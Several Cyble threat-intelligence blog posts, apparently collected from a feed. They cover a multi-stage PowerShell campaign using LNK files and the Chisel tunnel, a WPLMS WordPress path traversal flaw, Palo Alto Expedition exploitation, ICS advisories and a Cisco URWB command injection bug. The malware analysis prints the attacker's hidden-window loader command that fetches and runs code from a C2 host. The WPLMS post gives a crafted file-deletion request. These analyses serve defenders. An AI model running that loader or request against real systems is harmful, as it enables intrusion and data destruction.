Key Takeaways

• Cyble Research and Intelligence Lab (CRIL) has identified a sophisticated campaign employing PowerShell in a multi-stage infection process. 
• The attack initiates with a suspicious LNK file, which activates a PowerShell script designed to download and execute malicious payloads. This layered strategy enhances stealth, evades detection, and ensures prolonged persistence within the target system. 
• In the first stage, the LNK file runs an initial remote obfuscated PowerShell script that establishes persistence by deploying and executing a secondary PowerShell script and batch files. 
• The second-stage PowerShell script continues communication with the command-and-control (C&C) server and executes a third-stage PowerShell script. 
• The third and final stage PowerShell script sends requests for command chains and includes routines to execute received commands as directed by the C&C server. 
• An analysis of the Network infrastructure reveals the presence of a Chisel DLL, suggesting the Threat Actor (TA) may leverage the Chisel client for further C&C communications and to enable lateral movement operations within the compromised network.
• The TA also likely utilizes the Netskope proxy for command and control (C&C) communication with the Chisel server.

Executive Summary

CRIL has recently identified a campaign engaging in a multi-stage infection chain. This chain employs several techniques, starting with the execution of PowerShell scripts. The campaign begins with a malicious LNK file that triggers the execution of a first-stage remote PowerShell script. This script aims to establish persistence on the victim’s system by dropping and running a second-stage PowerShell script. The second-stage script maintains communication with the C&C server, allowing it to download and execute an additional third-stage PowerShell script.

The third-stage script continuously interacts with the C&C server to receive command chains. It executes these commands based on the instructions provided, enabling a variety of malicious activities, such as data exfiltration or lateral movement. The presence of a Chisel DLL on the remote server suggests that the TA may utilize Chisel for advanced operations, including setting up a SOCKS proxy and facilitating lateral movement within the infected network, further strengthening their foothold and enabling stealthy communications.

Technical details:

The infection chain begins when the user inadvertently executes a malicious LNK (shortcut) file. However, the initial infection vector of the LNK file remains unidentified. This LNK file is crafted to run a PowerShell command, which downloads another Base64 encoded PowerShell command from the remote server and then executes it.

The Powershell command uses techniques to bypass Windows security mechanisms, such as setting the PowerShell execution policy to “Bypass,” which allows the script to run without restrictions typically enforced by the system’s security settings. Additionally, the PowerShell window is executed in hidden mode, ensuring that the user does not see any visual indicators of the malicious activity. Following is the PowerShell command:

“C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -wind hid $x=wget -UseB -Ur ‘hxxps://c2.innov-eula[.]com/feibfiuzbdofinza’;powershell -wind hid -ep byp -e $x”

The figure below shows the property of the shortcut file.

The figure below displays the Base64-encoded PowerShell script, highlighting the sophisticated methods used to conceal its true functionality.

This de-obfuscated PowerShell script is a sophisticated piece of code engineered to establish persistence and download a PowerShell script from the C&C server. It employs various obfuscation techniques to evade detection and execute its malicious activities stealthily. The figure below shows the de-obfuscated PowerShell script.

First Stage PowerShell Script

In the First Stage, the PowerShell Script performs the following tasks

• Initially, the PowerShell script creates a Hidden directory at “C:UsersMalWorkstationAppDataRoamingMicrosoftLogs” and sets the variable “$HASH” with a seemingly random string, “bdhbzaibdiBKJBJIBDI67869686806656..”. While the exact purpose of this variable is unclear, it could be a placeholder for future use.
• To ensure secure communications, the PowerShell script configures the security protocol to TLS 1.2
• It then retrieves the system’s hostname with the “hostname” command and proceeds to obfuscate this information, converting it to a Base64-encoded string
• This command attempts to retrieve the proxy settings for the specified URL, “hxxp://google.es/,” and constructs the authorization header, appending Base64-encoded hostname.
• If a proxy is configured on the victim’s machine, it uses the proxy to send a request to “hxxps://c2.innov-eula.com/” with the constructed Authorization header. If no proxy is configured, it sends the same request directly without using a proxy.
• The response from the request is stored in the $R variable, which contains a PowerShell script. This script is then saved in the “Logs” folder with the filename “Log_29109314.ps1.” and then executed subsequently.
• The PowerShell script creates two batch files, “Log_29109317.bat” and “Log_29109318.bat,” in the Logs folder. The “Log_29109317.bat” file runs the “Log_29109314.ps1” script, while the “Log_29109318.bat” file moves “Log_29109317.bat” to the startup folder for persistence.

The figure below shows the content of the Logs Folder.

Second Stage PowerShell Script

The second-stage PowerShell script operates similarly to the first one, establishing a connection to the C&C server using the proxies. Once connected, it retrieves the next stage of the attack, which is a PowerShell script encoded in Base64. The script then decodes and executes this Base64-encoded PowerShell script, continuing the attack chain. The figure below shows the contents of the second-stage PowerShell script.

Third Stage PowerShell Script

In the Third Stage, the PowerShell Script performs the following tasks

• The PowerShell script initializes critical variables like “$CHAIN” and “$JITTER” to control its operation. The “$CHAIN” variable tracks the current status of the communication with the Command and Control (C&C) server, while “$JITTER” introduces random delays at various stages to avoid detection by security systems.
• The script then retrieves and encodes the infected machine’s hostname in Base64 and uses it to construct a web request for the system’s proxy settings via “hxxp://google.es/”.
• If “$CHAIN” is “0”, it prepares an Authorization header with the hostname and retrieves data from “hxxps://c2.innov-eula.com/”, using proxy settings if needed. The response is stored in “$CHAIN” to establish communication with the remote server.
• Next, the PowerShell script checks if “$CHAIN” contains invalid characters. If it does, it resets “$CHAIN” to “0” and introduces a random delay. Otherwise, it prepares an Authorization header with “$CHAIN” and hostname and sends a request to “hxxps://c2.innov-eula.com/”.
• The server’s response is split and stored in “$CMD”. If the command is not “WAIT,” it executes a PowerShell command encoded in “$CMD[1]”. The response is then processed and split into chunks, which are sent back to the server in multiple requests.
• The process continues, handling each chunk until the “END” command is received. The PowerShell script is shown below.

The figure below shows the de-obfuscated third-stage PowerShell script.

Open Directory

At the time of execution, we were not able to observe any commands from the C&C server. However, after checking for the network infrastructure, we came across an open directory, “hxxps:/credit-agricole.webdev.innov-eula[.]com”, hosting the malicious LNK file along with other files as shown in the figure below.

Chisel

The open directory contains a suspicious file named chisolo.dll, which is identified as Chisel—a fast TCP/UDP tunneling tool written in Go. Chisel operates over HTTP and is secured via SSH. It uses a single executable for both the client and server, making it particularly effective for bypassing firewalls.

 Chisel has been widely adopted by various threat actors as a powerful tunneling tool, enabling them to pivot into compromised environments with stealth and efficiency. Notable groups such as Sandworm APT, Lorenz Ransomware, and Pysa Ransomware have leveraged Chisel in their campaigns to facilitate lateral movement and maintain persistence.

The Threat Actor can leverage the Chisel tool for various malicious purposes.

Scanning the Internal Network

After compromising the system using the previously mentioned infection, the TA deploys and executes the Chisel client on the compromised machine. This allows the TA to use the infected machine as a SOCKS proxy, enabling them to scan the internal network with tools like Nmap.

Accessing Protected Internal Networks

Once the internal networks are identified, the TA can use the compromised machine to create a tunnel using the Chisel client. This tunnel provides access to networks that are otherwise shielded from external connections, allowing the TA to infiltrate internal systems not exposed to the outside.

Enabling External Connections for Isolated Machines

The TA can also leverage the Chisel client to enable internet access for machines that are otherwise unable to connect. This allows the TA to download additional malicious samples for further exploitation and maintain persistence within the network.

The chisel client sample identified in this campaign has three export functions, as shown below.

The export functions main and xlAutoOpen have code to start the Chisel client on the infected machine, as shown below.

Interestingly, the Threat Actor (TA) is using the IP address 163.116.128[.]80 over port 8080, associated with Netskope, as an explicit proxy. By routing their traffic through this Netskope proxy, we suspect that the TA is likely using this to obfuscate their communications with the C&C server – hxxps://ligolo.innov-eula[.]com.

This approach allows them to bypass traditional network defenses and evade detection, making it difficult for security teams to identify and block malicious C&C traffic. The figure below shows a code snippet used by the Chisel client containing a proxy IP address and C&C URL.

Although direct commands from the C&C server were not observed, the TA likely uses the C&C to issue commands to download and execute the Chisel client on the compromised machine. Once the Chisel tunnel is established between the C&C server and the victim’s machine, this tunnel enables the TA to control the compromised system more effectively. Through this channel, the TA can send specific commands to identify the internal network, move laterally across connected systems, and download additional malicious payloads. These actions enhance the TA’s control and facilitate further malicious activities within the internal environment. The setup effectively provides the TA with a hidden and flexible pathway into internal systems that would otherwise be isolated from external access.

Threat hunting Packages

Our exclusive threat-hunting packages, which include YARA and Sigma rules specifically designed to detect campaigns involving the Chisel tool and related malicious activities.

Additionally, our threat-hunting packages empower organizations to proactively identify and mitigate cyber threats, enabling them to stay ahead of cybercriminals. These packages help detect potential risks and malicious activities before they can cause harm, ensuring a stronger defense against evolving cyber threats.

We have over 15,000 threat-hunting packages and growing. To learn more about how you can gain access to our latest actionable threat intel, click here.

Conclusion

This sophisticated multi-stage PowerShell campaign uses an LNK file to activate a sequence of obfuscated scripts, which maintain persistence and ensure stealth by connecting with a command-and-control (C&C) server. The attack involves Chisel and a Netskope proxy for covert communication, enabling lateral movement within the network. This setup reflects advanced threat actor tactics aimed at prolonged control and evasion, suggesting a highly organized or financially motivated campaign.

Recommendations

• Deploy endpoint detection and response (EDR) solutions that can identify and stop unusual PowerShell activity. Ensure that all endpoints are configured to log PowerShell command executions and unusual file behaviors, such as LNK file executions from non-standard locations.
• Limit access to PowerShell and other scripting tools based on user roles. Where possible, apply “constrained language mode” to restrict the types of commands that can be executed.
• Monitor network traffic for unusual connections, particularly those using uncommon ports or protocols (such as Chisel’s tunneling). Network segmentation can limit lateral movement, restricting an attacker’s access even if they compromise one segment.
• Train users to recognize and avoid suspicious links or files, particularly those delivered via email or other messaging platforms. Regular phishing simulations and awareness training can help prevent the initial compromise.
• Implement MFA on all sensitive systems. It can help prevent unauthorized access, even if credentials are compromised. This is especially important for privileged accounts that can execute PowerShell or access sensitive segments of the network.
• Integrate threat intelligence feeds that include indicators of compromise (IOCs) related to C&C servers, known malicious IP addresses, and techniques like Chisel tunneling. This intelligence can aid in detecting and blocking attacks that match these patterns.

MITRE ATT&CK® Techniques

Indicators of Compromise (IOCs)

The post Harnessing Chisel for Covert Operations: Dissecting a Multi-Stage PowerShell Campaign appeared first on Cyble.

Blog – Cyble – ​Read More

Overview 

A critical path traversal vulnerability, CVE-2024-10470, has been identified in the WPLMS Learning Management System (LMS) theme for WordPress. This vulnerability enables unauthenticated attackers to read and delete arbitrary files on the server due to insufficient file path validation in the theme’s readfile and unlink functions.  

The flaw affects all versions of WordPress up to and including 4.962 and carries a CVSS score of 9.8. 

According to the bug description published on GitHub under the account moniker RandomRobbieBF, the flaw impacts WordPress sites running WPLMS even if the theme is not actively enabled. This likely puts thousands of LMS-driven websites at risk of unauthorized data access, site disruption, and potential full system compromise. 

The CVE-2024-10740’s original finding is attributed to an independent researcher Friderika Baranyai, aka Foxyyy. 

Vulnerability Details 

• CVE: CVE-2024-10470 
• Type: Path Traversal (CWE-22) 
• Affected Theme: WPLMS Learning Management System for WordPress 
• Affected Versions: <= 4.962 
• Severity: Critical (CVSS 9.8) 
• Impact: Confidentiality, Integrity, Availability 
• Found By: Friderika Baranyai, aka Foxyyy 

Exploitation Details 

This vulnerability allows attackers to delete critical files, such as wp-config.php, without needing authentication. Deleting this file, which contains essential WordPress configuration settings, could enable attackers to gain remote control over the affected server, leading to potential code execution and full site compromise. 

While there is no publicly available proof-of-concept (PoC) or evidence of active exploitation, the nature of this vulnerability means that attackers could send crafted requests to delete or read files arbitrarily.  

For example, the download_export_zip parameter within certain WPLMS theme scripts can be exploited to read or delete sensitive server files, leading to significant security risks for affected WordPress installations. 

A sample crafted request, as described on GitHub, which could exploit this vulnerability is as follows: 

POST /wp-content/themes/wplms/setup/installer/envato-setup-export.php HTTP/1.1 

Host: [Target-IP] 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 29 

download_export_zip=1&zip_file=.htaccess 

This request manipulates the zip_file parameter to target and potentially delete files like .htaccess, which could lead to server misconfiguration or unauthorized file access. 

Mitigation and Recommendations 

Website administrators are advised to take the following actions to address this bug: 

1. Deactivate and Remove the WPLMS Theme: If possible, temporarily deactivate the WPLMS theme until a patch is available. Remove it if it’s not essential to your website’s functionality. 
2. Apply Strong Access Controls: Restrict access to critical files, such as wp-config.php, and ensure that file permissions are strictly enforced to prevent unauthorized deletion or modification. 
3. Implement File Integrity Monitoring: Regularly monitor the integrity of critical WordPress files. Immediate alerts on file deletion or modifications can provide timely warnings of potential exploitation. 
4. Back Up WordPress Installations Regularly: Maintain regular backups of your website’s files and database to ensure rapid recovery in the event of an attack. 
5. Web Application Firewall (WAF): Use a WAF to filter potentially malicious requests. This can help prevent attackers from exploiting path traversal vulnerabilities. 
6. Monitor for Updates: Regularly check for updates from the WPLMS theme developer and apply any available patches as soon as they are released. The vulnerability is resolved in version 4.963, so updating to this version will eliminate the risk. 
7. Isolate WordPress Installations: For sites heavily dependent on the WPLMS theme, consider isolating the installation in a separate, highly controlled environment to reduce the risk of lateral movement if exploited. 

Conclusion 

The CVE-2024-10470 vulnerability in the WPLMS theme for WordPress represents a severe security threat to affected websites. By allowing unauthenticated file deletion, this flaw poses risks of unauthorized access, remote code execution, and potential full compromise of WordPress installations. 

Administrators are urged to take immediate steps to secure their systems, including deactivating the theme if feasible, implementing access controls, and applying security patches as soon as they are available. 

Following these recommendations, organizations can mitigate potential exploitation and protect their WordPress environments from unauthorized access and service disruption. 

Source: 

https://nvd.nist.gov/vuln/detail/CVE-2024-10470
https://github.com/RandomRobbieBF/CVE-2024-10470
https://themeforest.net/item/wplms-learning-management-system/6780226
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/wplms/wplms-learning-management-system-for-wordpress-4962-unauthenticated-arbitrary-file-read-and-deletion
https://www.wordfence.com/threat-intel/vulnerabilities/researchers/friderika-baranyai

The post Path Traversal Vulnerability in WPLMS WordPress Theme Exposes Websites to RCE  appeared first on Cyble.

Blog – Cyble – ​Read More

Overview

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday alerted federal agencies regarding active exploitation of a critical missing authentication vulnerability in Palo Alto Networks’ Expedition, a tool widely used by administrators for firewall migration and configuration management.

This flaw, designated CVE-2024-5910, has been actively exploited by attackers since its patch release in July, underscoring the urgency for immediate remediation.

Expedition is a popular migration tool designed to assist administrators in transitioning firewall configurations from vendors such as Check Point and Cisco to Palo Alto’s PAN-OS. However, due to a missing authentication mechanism, this tool now presents a significant risk for compromised credentials and potentially severe network intrusions.

What is CVE-2024-5910 Vulnerability

The CVE-2024-5910 vulnerability in Palo Alto Networks’ Expedition tool is a missing authentication flaw, which allows an attacker with network access to exploit the vulnerability and take over an admin account.

Once exploited, attackers can potentially gain access to sensitive configuration secrets, credentials, and other data stored within the tool. This flaw carries a critical CVSSv4.0 base score of 9.3.

According to Palo Alto Networks, only Expedition versions below 1.2.92 are vulnerable, while all versions from 1.2.92 and onward are protected against this flaw. As CISA emphasized, the lack of authentication on such a critical function poses severe security risks, especially for government and enterprise environments relying on Expedition for firewall migration and tuning.

Technical Details and Vulnerability Summary

• Vulnerability: CVE-2024-5910 (Missing Authentication for Critical Function)
• Severity: CRITICAL (CVSSv4.0 Score: 9.3)
• Affected Versions: Expedition versions below 1.2.92
• Unaffected Versions: Expedition 1.2.92 and later
• Weakness Type: CWE-306, Missing Authentication for Critical Function
• Impact: Admin account takeover, access to sensitive configuration data, potential firewall control

Likely Reason for Exploitation of CVE-2024-5910

Although Palo Alto Networks initially released a patch in July to fix CVE-2024-5910, the exploitation attempts likely escalated when security researcher Zach Hanley from Horizon3.ai released a proof-of-concept (PoC) in October.

This PoC showed how CVE-2024-5910 admin reset vulnerability could be chained with another command injection vulnerability – CVE-2024-9464. This combination allows for unauthenticated, arbitrary command execution on vulnerable Expedition servers, enabling attackers to execute commands remotely.

This chained vulnerability scenario magnifies the risk, as attackers can exploit the admin reset vulnerability to ultimately compromise PAN-OS firewall admin accounts, providing full control over firewall configurations and potentially allowing access to sensitive network areas.

CISA’s Known Exploited Vulnerabilities Catalog Update

Adding to the urgency, CISA has included CVE-2024-5910 in its Known Exploited Vulnerabilities (KEV) Catalog. This addition mandates all U.S. federal agencies to secure vulnerable Expedition servers against potential attacks by November 28. This move underscores the federal directive for securing essential digital infrastructure against known vulnerabilities, especially those that facilitate admin credential resets and remote command execution.

Recommendations and Mitigations

To secure systems against this exploit, it is strongly recommended that administrators:

1. Upgrade Expedition to Version 1.2.92 or Later: This release addresses CVE-2024-5910 and subsequent vulnerabilities, providing a robust safeguard against admin account takeover and unauthorized access.
2. Rotate All Credentials Post-Upgrade: After updating to the latest version, administrators should rotate all Expedition usernames, passwords, and API keys. Additionally, all firewall usernames, passwords, and API keys processed through Expedition should be reset to prevent any potential misuse of compromised credentials.
3. Restrict Network Access: As a mitigating measure, organizations unable to immediately apply the patch should restrict network access to Expedition servers to authorized users and hosts only. Network segmentation and access control lists (ACLs) should be employed to limit exposure.

Conclusion

The exploitation of CVE-2024-5910 exemplifies the persistent challenge organizations face in securing digital tools that facilitate network management and firewall configuration. Regular patching, vigilant credential management, and access control are fundamental to safeguarding critical infrastructure against similar vulnerabilities.

With CISA actively monitoring this threat and urging patching compliance, addressing this vulnerability is essential not only for regulatory compliance but for maintaining network security integrity.

By upgrading to the latest version of Expedition and implementing the outlined mitigations, organizations can strengthen their defenses against these specific exploits and prevent unauthorized access to network configurations.

Sources:

https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2024-5910&field_date_added_wrapper=all&field_cve=&sort_by=field_date_added&items_per_page=20&url=

https://security.paloaltonetworks.com/CVE-2024-5910

https://github.com/horizon3ai/CVE-2024-9464

The post CISA Finds Palo Alto Networks’ CVE-2024-5910 Exploited in the Wild appeared first on Cyble.

Blog – Cyble – ​Read More

Overview

Cyble Research & Intelligence Labs (CRIL) has investigated significant ICS vulnerabilities this week, providing essential insights derived from advisories issued by the Cybersecurity and Infrastructure Security Agency (CISA). This week’s report highlights multiple vulnerabilities across critical ICS products, with specific focus on those from Rockwell Automation, Delta Electronics, and Solar-Log.

CISA released three security advisories addressing four ICS vulnerabilities across these products, underscoring the urgent need for mitigation.

Among the most notable is a Cross-Site Scripting (XSS) flaw in Solar-Log Base 15, a widely used photovoltaic energy management product, which poses heightened risks due to internet-facing deployments identified by Cyble’s ODIN scanner.

ICS Vulnerabilities Overview

CRIL has pinpointed the following critical ICS vulnerabilities requiring immediate action:

• CVE-2023-46344 – Solar-Log Base 15
  • Type: Cross-Site Scripting (XSS)
  • Severity: Medium
  • Description: This vulnerability allows unauthorized access through internet-facing instances, enabling attackers to potentially compromise device security and functionality. Cyble’s ODIN scanner identified a significant number of Solar-Log Base 15 devices deployed in Germany, emphasizing the need for prompt patching.
  • Patch available here.

• CVE-2024-10456 – Delta Electronics InfraSuite Device Master
  • Type: Deserialization of Untrusted Data
  • Severity: Critical
  • Description: The Delta InfraSuite Device Master vulnerability allows critical systems to process untrusted data, which could lead to unauthorized access or system manipulation. This vulnerability impacts essential operational systems, necessitating immediate patching.
  • Patch available here.

• CVE-2024-10386 – Rockwell Automation ThinManager
  • Type: Missing Authentication for Critical Function
  • Severity: Critical
  • Description: Rockwell Automation’s ThinManager vulnerability allows unauthorized users to access sensitive systems without proper authentication, potentially exposing operational systems to attacks. This flaw requires urgent attention due to its impact on operational continuity.
  • Patch available here.

• CVE-2024-10387 – Rockwell Automation ThinManager
  • Type: Out-of-Bounds Read
  • Severity: Medium
  • Description: This vulnerability could allow unauthorized data access, which can lead to security breaches in operational systems if left unpatched.
  • Patch available here.

The severity overview indicates that these vulnerabilities span medium to critical levels, affecting critical infrastructure and necessitating prioritized mitigation.

Figure 1. Sectors impacted due to these vulnerabilities. (Source: CRIL)

Recommendations and Mitigations

To address these vulnerabilities effectively, organizations should consider the following best practices:

1. Stay Updated: Regularly monitor security advisories from vendors and regulatory bodies to stay informed of critical patches and vulnerabilities.
2. Risk-Based Vulnerability Management: Implement a risk-focused approach to manage and patch vulnerabilities based on their potential impact, especially for internet-facing ICS components.
3. Network Segmentation: Isolate critical assets using effective network segmentation to prevent lateral movement and reconnaissance attempts by potential attackers.
4. Continuous Vulnerability Assessments: Conduct regular vulnerability assessments, audits, and penetration testing to proactively identify and fix security loopholes.
5. Utilize Software Bill of Materials (SBOM): Maintain visibility into software components, libraries, and dependencies to detect vulnerabilities promptly.
6. Incident Response Preparedness: Develop and routinely test a robust incident response plan, ensuring it is aligned with the latest threat landscape.
7. Cybersecurity Training: Conduct ongoing training programs for employees, particularly those with access to OT systems, covering threat recognition, authentication protocols, and security best practices.

Conclusion

The vulnerabilities highlighted in this ICS intelligence report call for swift action from organizations to mitigate potential security risks. With threats evolving rapidly and exploit attempts on the rise, maintaining a proactive stance is essential. By prioritizing the recommendations and implementing necessary patches, organizations can safeguard critical infrastructure, enhance operational resilience, and minimize the risk of exploitation.

Source:

The post Weekly ICS Vulnerability Intelligence Report: Rockwell Automation, Delta Electronics, Solar-Log appeared first on Cyble.

Blog – Cyble – ​Read More

Overview

Cisco has disclosed a severe vulnerability, tracked as CVE-2024-20418, in its Unified Industrial Wireless Software for Ultra-Reliable Wireless Backhaul (URWB) Access Points. The flaw, rated with a maximum CVSS score of 10.0, affects multiple Cisco Catalyst Access Point models.

Attackers exploiting this vulnerability can gain root-level control, enabling unauthorized command execution on vulnerable devices.

Vulnerability Details

This critical CVE-2024-20418 vulnerability stems from improper input validation within Cisco’s web-based management interface, which controls URWB Access Points. A remote attacker without authentication can exploit this flaw by sending specially crafted HTTP requests to vulnerable devices, thereby injecting commands with root privileges on the device’s operating system.

Cisco has responded by releasing updates to mitigate the risk, advising immediate software upgrades as there are no workarounds. Importantly, only devices operating in URWB mode are impacted.

According to the Office of Information Technology of the New York State, while government institutions and business are at high risk of the bug, home users could be the least affected.

RISK:
Government:

• Large and medium government entities: High
• Small government entities: Medium

Businesses:

• Large and medium business entities: High
• Small business entities: Medium

Home users: Low

What is Cisco’s Ultra-Reliable Wireless Backhaul (URWB)?

Cisco’s URWB technology provides the robust, low-latency wireless connectivity essential for critical, high-stakes applications across industrial and mobile environments. Designed to replace costly and complex wired infrastructure, URWB enables seamless, multigigabit performance with minimal packet loss, making it invaluable for sectors relying on autonomous systems.

Industries including ports, railways, and manufacturing leverage URWB for real-time applications, such as video monitoring and remote machinery control, benefiting from reduced deployment costs and greater flexibility. The technology supports dual-mode capability, allowing devices to toggle between URWB and Wi-Fi 6/6E based on project needs, thereby optimizing infrastructure investments.

Affected Devices

The following Cisco Catalyst Access Points running a vulnerable version of Cisco’s Unified Industrial Wireless Software are affected if URWB mode is enabled:

• Catalyst IW9165D Heavy Duty Access Points
• Catalyst IW9165E Rugged Access Points and Wireless Clients
• Catalyst IW9167E Heavy Duty Access Points

To determine if URWB mode is enabled, Cisco advises using the show mpls-config command. If available, URWB mode is active, and the device is vulnerable.

Cisco has confirmed that other products, including the 6300 Series Embedded Services Access Points, Aironet models, and Catalyst 9100 Series Access Points, are unaffected.

Mitigation Steps

Cisco has issued free software updates addressing this vulnerability. However, users must ensure they are compliant with licensing and have sufficient memory and compatible configurations for successful upgrades.

Customers without service contracts should reach out directly to the Cisco Technical Assistance Center (TAC) for help obtaining the necessary updates. More details can be found on Cisco’s Security Advisory page.

Fixed Software Releases

For the Cisco Unified Industrial Wireless Software versions affected, the company has released the following fixed versions:

• 17.15 – First fixed in version 17.15.1
• 17.14 and earlier – Cisco advises migrating to the nearest fixed release.

Security practitioners managing industrial or critical infrastructure networks are strongly urged to update vulnerable devices promptly. Failure to patch could expose systems to high-risk attacks due to the root-level access that this vulnerability permits.

Sources:

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-backhaul-ap-cmdinj-R7E28Ecs

https://www.cisco.com/c/en/us/products/collateral/wireless/ultra-reliable-wireless-backhaul/ultra-wireless-backhaul-so.html

https://its.ny.gov/2024-123

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20418

The post Critical Bug in Cisco’s URWB Exposes Systems to Root Privilege Command Injection appeared first on Cyble.

Blog – Cyble – ​Read More